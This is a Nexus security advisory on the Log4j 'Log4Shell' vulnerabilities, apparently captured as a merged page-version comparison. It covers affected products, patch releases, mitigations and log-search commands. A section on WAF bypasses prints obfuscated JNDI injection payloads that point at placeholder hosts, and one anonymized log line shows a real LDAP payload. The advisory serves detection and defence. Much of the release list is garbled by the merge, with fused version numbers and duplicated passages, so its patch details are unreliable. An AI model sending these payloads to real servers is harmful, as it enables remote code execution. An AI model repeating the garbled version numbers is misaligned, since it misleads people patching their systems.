Versions Compared
Key
- This line was added.
- This line was removed.
- Formatting was changed.
General information
This message contains information related to the recently published remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.
This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Further on, these additional CVEs was also reported for Log4j, CVE-2021-45046 for the 2.15 version, as well as CVE-2021-45105 for 2.16.
The Nexus Security team is currently investigating the impact of the Log4j remote code execution vulnerability (CVE-2021-44228), (CVE-2021-45046), (CVE-2021-45105) and determining the possible impact on our products.
Information about the update
Refer to the table in section "Nexus components" for the latest information for the components.
| Note | ||
|---|---|---|
| ||
There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability. Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one. Nexus will update Log4j again with the next regular release of the corresponding product versions. |
Releases with fixed versions of the affected components:
General information
This article contains information related to the remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.
This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Further on, these additional CVEs was also reported for Log4j, CVE-2021-45046 for the 2.15 version, as well as CVE-2021-45105 for 2.16.
The Nexus Security team has investigated the impact of the Log4j remote code execution vulnerability (CVE-2021-44228), (CVE-2021-45046), (CVE-2021-45105) and the possible impact on our products.
Information about the update
Refer to the table in section "Nexus components" for the latest information for the components.
| Note | ||
|---|---|---|
| ||
There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability. Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one. Nexus will update Log4j again with the next regular release of the corresponding product versions. |
Releases with fixed versions of the affected components:
Nexus SaaS customers
If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team. At this point in time, we have taken all necessary steps, and are awaiting our internal engineering teams to provide a permanent fix. We are monitoring the situation to further analyze any new changes to the CVE and the potential methods of exploiting it, to ensure security and stability in the environment.
Currently, the team is performing deeper analysis of attack patterns, to be able to tweak our service platform even further, for any future adaptations of this vulnerability. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE.
Nexus components
This list contains the components from Nexus, and their respective affected versions.
Component
Affected versions
Comment
Smart ID Certificate Manager
None of the supported versions are affected
Does not use Log4j
Nexus OCSP Responder
None of the supported versions are affected
Does not use Log4j
Nexus Timestamp Server
None of the supported versions are affected
Does not use Log4j
Smart ID Desktop / Mobile App
None of the supported versions are affected
Does not use Log4j
Nexus Card SDK
None of the supported versions are affected
Does not use Log4j
Smart ID Physical Access
None of the supported versions are affected
Does not use Log4j
Smart ID Digital Access (previously named Hybrid Access Gateway – HAG)
When using syslog, Digital Access uses Log4j logging. We are still investigating this, as we have yet not been able to reproduce a successful attack.
For all other purposes, an internal logging framework is used. This framework is not affected by CVE-2021-44228.
| Note |
|---|
|
Versions < 6.0.5 are not affected
All versions of HAG are not affectedRecommendation is to implement mitigation as described below, or upgrade to 6.1.1.
Smart ID Identity Manager / PRIME
3.5
3.6
Supported WAR versions:
3.7
3.8
3.9
3.10
3.11
3.12
Supported Docker versions:
20.06
20.11
21.04
21.10
| Note |
|---|
|
- Smart ID version 21.10.2 –This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.2 - Smart ID version 21.10.1 –This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1 - Smart ID version 21.04.7 –This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.7 - Smart ID version 21.04.6 –This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.1004.16 - Smart ID version 2120.0411.6 3 –This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 2120.0411.63
Smart ID - Digital Access version 206.111.3 2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as and it is packaged with Log4j 2.1617.
You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3Digital Access component 6.1.2 - Digital Access version 6.1.2 1 –This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and as it is packaged with Log4j 2.1716.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2
Digital Access version 6.1.1 –1 - Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1Smart ID Identity Manager 3.12.14 - Smart ID Identity Manager (PRIME) version 3.1211.145 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14
Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5 - Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30
Our engineering teams are working hard to develop fixes and ensuring that we provide the best possible fixes for you.
Since Friday evening, 2021-12-10, Nexus has a dedicated incident team synchronizing our actions after the announcement of the Log4j CVE. This is to be able to ensure that we work as effectively as possible during these first intensive days after such a critical CVE is released in the wild.
We can see tests and probing being performed on several customers, including our own SaaS environments, but have not yet seen or heard of any case where an attack on our products has actually been successful.
Factors like WAF (Web Application Firewall), Egress control (Firewall or other method of controlling what traffic is allowed from the inside and our) could be mitigation factors in some cases.
- with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5 - Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30
Nexus SaaS customers
If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team.Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE.
Nexus components
This list contains the components from Nexus, and their respective affected versions.
Component | Affected versions | Comment | |||||
|---|---|---|---|---|---|---|---|
Smart ID Certificate Manager | None of the supported versions are affected | Does not use Log4j | |||||
Nexus OCSP Responder | None of the supported versions are affected | Does not use Log4j | |||||
Nexus Timestamp Server | None of the supported versions are affected | Does not use Log4j | |||||
Smart ID Desktop / Mobile App | None of the supported versions are affected | Does not use Log4j | |||||
Nexus Card SDK | None of the supported versions are affected | Does not use Log4j | |||||
Smart ID Physical Access | None of the supported versions are affected | Does not use Log4j | |||||
Smart ID Digital Access (previously named Hybrid Access Gateway – HAG) | Versions => 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging. |
Versions < 6.0.5 are not affected All versions of HAG are not affected | |||||
Smart ID Self-ServiceIdentity Manager / PRIME | EOL WAR versions: |
21.10 | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix | Smart ID Messaging component - Hermod | None of the supported versions are affected | Hermod is shipped with Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, and not Log4j. See reference in documentation: Link and: Link
| Note |
|---|
If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ship our released versions to you. |
Mitigation
Until a patch can be provided, we recommend that you follow the information available on the CVE.
Nexus engineering teams are working on a permanent fix for our products and aim to get this available to you as soon as possible, this will then be based on Log4j 2.16
Apache advises that if patching is not immediately possible, there is currently only one mitigation available, that is the recommended one by Apache. See this page for reference: Apache security page
Remove JndiLookup class from the classpath.
To do this, enter this command:
| Code Block |
|---|
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class |
This will provide a workaround for CVE-2021-44228In PatternLayout in the logging configuration, replace Context Lookups like
${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).In the configuration, remove references to Context Lookups like
${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.This will provide a workaround for CVE-2021-45105Performing this will prevent the vulnerability from working, as your application server will not perform the callback needed for the vulnerability to be successful.
Recommendation is to implement mitigation as described below, or upgrade. | |||
Smart ID Self-Service | Supported WAR versions: 3.9 20.06 | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix | |
Smart ID Messaging component - Hermod | None of the supported versions are affected | Hermod is shipped with Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, and not Log4j. See reference in documentation: Link and: Link |
| Note |
|---|
If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ship our released versions to you. |
Mitigation
Patch using the latest available version from Nexus, as specified above.
For temporary mitigations, we recommend that you refer to Apaches public documentation for each specific CVE: https://logging.apache.org/log4j/2.x/security.html
Further information
As an additional recommendation, we highly encourage you to investigate all other application servers (non Nexus software) you might have, that could use Log4j.
We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.
This list contains some of the known applications that could be vulnerable to this CVE:
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
Log4j RCE exploitation detection
You can use these commands and rules to search for exploitation attempts against Log4j RCE vulnerability CVE-2021-44228.
| Note |
|---|
The below commands are examples, and you will need to point the commands to your respective application log folder. |
| Note |
|---|
Nexus does not have access to the systems hosted by you, the customer, (except for Nexus SaaS Services, where this is handled by the service organization) and it is vital that you perform investigations of your own to make sure that you have not been breached and is subject to any form of data breach. |
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
| Code Block |
|---|
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log |
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
| Code Block |
|---|
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' |
Grep / Zgrep - Obfuscated variants
These commands cover even the obfuscated variants but lack the file name in a match.
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
| Code Block |
|---|
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \; |
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
| Code Block |
|---|
sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(l |
Yara file
YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virus total and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.
On this GitHub page, you can find a YARA file that is tailormade for this CVE (CVE-2021-44228)
Credit for the Grep and Yara files goes to Neo23x0 / Florian Roth. We share these with you, under the Detection Rule license (DRL) 1.1
WAF bypass methods
Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.
There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.
Note: asdasd and xxxxxx are only examples, this will be the attackers url in a real scenario.
| Code Block | ||
|---|---|---|
| ||
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} |
This is an example of how this could look like in an application log (real request, anonymized):
| Code Block |
|---|
2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/
Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBh
biBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404 |
Disclaimer
Nexus has made effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied and Nexus shall in no event be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.
Latest update date of this article
20212022-1202-22 1524 16:40 50 CET
Table of contents
| Table of Contents |
|---|